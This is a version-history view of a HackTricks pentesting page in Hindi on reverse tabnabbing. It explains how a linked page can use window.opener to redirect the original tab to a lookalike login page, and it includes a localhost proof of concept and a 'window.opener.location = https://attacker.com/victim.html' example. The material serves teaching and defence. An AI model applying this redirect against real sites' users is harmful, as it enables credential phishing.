hacktricks/pentesting-web/reverse-tab-nabbing.md

118 lines
11 KiB
Markdown
Raw Normal View History

2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह।
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)।
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) में शामिल हों या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **हैकिंग ट्रिक्स साझा करें** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) और [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) में PR जमा करके।
2022-04-28 16:01:33 +00:00
</details>
2023-11-06 08:38:02 +00:00
# विवरण
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
जब एक **हमलावर** एक **`<a`** टैग के **`href`** तर्क को नियंत्रित कर सकता है जिसमें **`target="_blank" rel="opener"`** विशेषता होती है और जिसे एक पीड़ित द्वारा क्लिक किया जाएगा, तो **हमलावर** इस **लिंक** को अपने नियंत्रण वाली वेब पर (एक **विषादी** **वेबसाइट**) इशारा कर सकता है। फिर, जब पीड़ित लिंक पर क्लिक करता है और हमलावर की वेबसाइट तक पहुंचता है, यह **विषादी** **वेबसाइट** जावास्क्रिप्ट ऑब्जेक्ट **`window.opener`** के माध्यम से **मूल** **पृष्ठ** को **नियंत्रित** कर सकेगी।\
यदि पृष्ठ में **`rel="opener"` नहीं है लेकिन `target="_blank"` है और इसमें `rel="noopener"` नहीं है, तो यह भी संक्रमित हो सकता है।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
इस व्यवहार का दुरुपयोग करने का एक सामान्य तरीका होगा कि **मूल वेब** की स्थान को `window.opener.location = https://attacker.com/victim.html` के माध्यम से हमलावर द्वारा नियंत्रित वेब पर बदल दें जो मूल वेबसाइट की तरह **दिखता है**, ताकि यह मूल वेबसाइट के **लॉगिन फ़ॉर्म** की **नकल** कर सके और उपयोगकर्ता से क्रेडेंशियल्स मांग सके।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
हालांकि, ध्यान दें कि जैसा कि **हमलावर अब मूल वेबसाइट के विंडो ऑब्जेक्ट को नियंत्रित कर सकता है**, वह इसे अन्य तरीकों से दुरुपयोग करके **छिपकली जैसे हमलों** को कर सकता है (शायद उसे जावास्क्रिप्ट इवेंट्स को संशोधित करके जानकारी को अपने द्वारा नियंत्रित किए गए सर्वर के लिए निकालने के लिए?)।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
# सारांश
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
## पीछे की ओर लिंक के साथ
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
जब प्रतिबंध विशेषता का उपयोग नहीं किया जाता है तो माता-पिता और बच्चे के पृष्ठों के बीच का लिंक:
2021-05-01 15:23:19 +00:00
2021-11-30 16:46:07 +00:00
![](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITH\_LINK.png)
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
## पीछे की ओर लिंक के बिना
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
प्रतिबंध विशेषता का उपयोग करने पर माता-पिता और बच्चे के पृष्ठों के बीच का लिंक:
2021-05-01 15:23:19 +00:00
2021-11-30 16:46:07 +00:00
![](https://owasp.org/www-community/assets/images/TABNABBING\_OVERVIEW\_WITHOUT\_LINK.png)
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
## उदाहरण <a href="#examples" id="examples"></a>
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
एक फ़ोल्डर में निम्नलिखित पृष्ठों को बनाएं और `python3 -m http.server` के साथ एक वेब सर्वर चलाएं\
फिर, **पहुंचें** `http://127.0.0.1:8000/`vulnerable.html, **लिंक पर क्लिक** करें और ध्यान दें कि **मूल** **वेबसाइट** **URL** **बदल जाता है**
2021-05-01 15:23:19 +00:00
{% code title="vulnerable.html" %}
```markup
<!DOCTYPE html>
<html>
<body>
<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
```
{% code title="malicious.html" %}
```markup
<!DOCTYPE html>
<html>
2023-11-06 08:38:02 +00:00
<body>
<script>
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
2021-05-01 15:23:19 +00:00
</html>
```
{% code title="malicious_redir.html" %}
2021-05-01 15:23:19 +00:00
```markup
<!DOCTYPE html>
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
```
{% endcode %}
2023-11-06 08:38:02 +00:00
## पहुँची जा सकने वाली गुणधर्म <a href="#accessible-properties" id="accessible-properties"></a>
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
दुष्ट साइट केवल निम्नलिखित गुणधर्मों तक ही पहुँच प्राप्त कर सकती है जो **ओपनर** जावास्क्रिप्ट ऑब्जेक्ट रेफरेंस (जो वास्तव में एक **विंडो** जावास्क्रिप्ट क्लास इंस्टेंस के लिए एक रेफरेंस है) में होती है जब **क्रॉस ऑरिजिन** (क्रॉस डोमेन्स) पहुँच की स्थिति में होती है:
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
* `opener.closed`: एक बूलियन मान लौटाता है जो यह दर्शाता है कि एक विंडो बंद की गई है या नहीं।
* `opener.frames`: मौजूदा विंडो में सभी आईफ्रेम तत्वों को लौटाता है।
* `opener.length`: मौजूदा विंडो में आईफ्रेम तत्वों की संख्या लौटाता है।
* `opener.opener`: विंडो को बनाने वाली विंडो के लिए एक रेफरेंस लौटाता है।
* `opener.parent`: मौजूदा विंडो के माता-पिता विंडो को लौटाता है।
* `opener.self`: मौजूदा विंडो को लौटाता है।
* `opener.top`: सबसे ऊपरी ब्राउज़र विंडो को लौटाता है।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
यदि डोमेन समान हैं तो दुष्ट साइट [**विंडो**](https://developer.mozilla.org/en-US/docs/Web/API/Window) जावास्क्रिप्ट ऑब्जेक्ट रेफरेंस द्वारा प्रकट किए गए सभी गुणधर्मों तक पहुँच प्राप्त कर सकती है।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
# रोकथाम
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
रोकथाम सूचनाएँ [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5\_Security\_Cheat\_Sheet.html#tabnabbing) में दर्ज की गई हैं।
2021-05-01 15:23:19 +00:00
2023-11-06 08:38:02 +00:00
# संदर्भ
2021-05-01 15:23:19 +00:00
{% embed url="https://owasp.org/www-community/attacks/Reverse_Tabnabbing" %}
2021-05-01 15:23:19 +00:00
2022-04-05 22:24:52 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks** में विज्ञापित करना चाहते हैं? या क्या आप **PEASS के नवीनतम संस्करण का उपयोग करना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2022-04-28 16:01:33 +00:00
2023-11-06 08:38:02 +00:00
- **अपने हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**।
2022-04-28 16:01:33 +00:00
</details>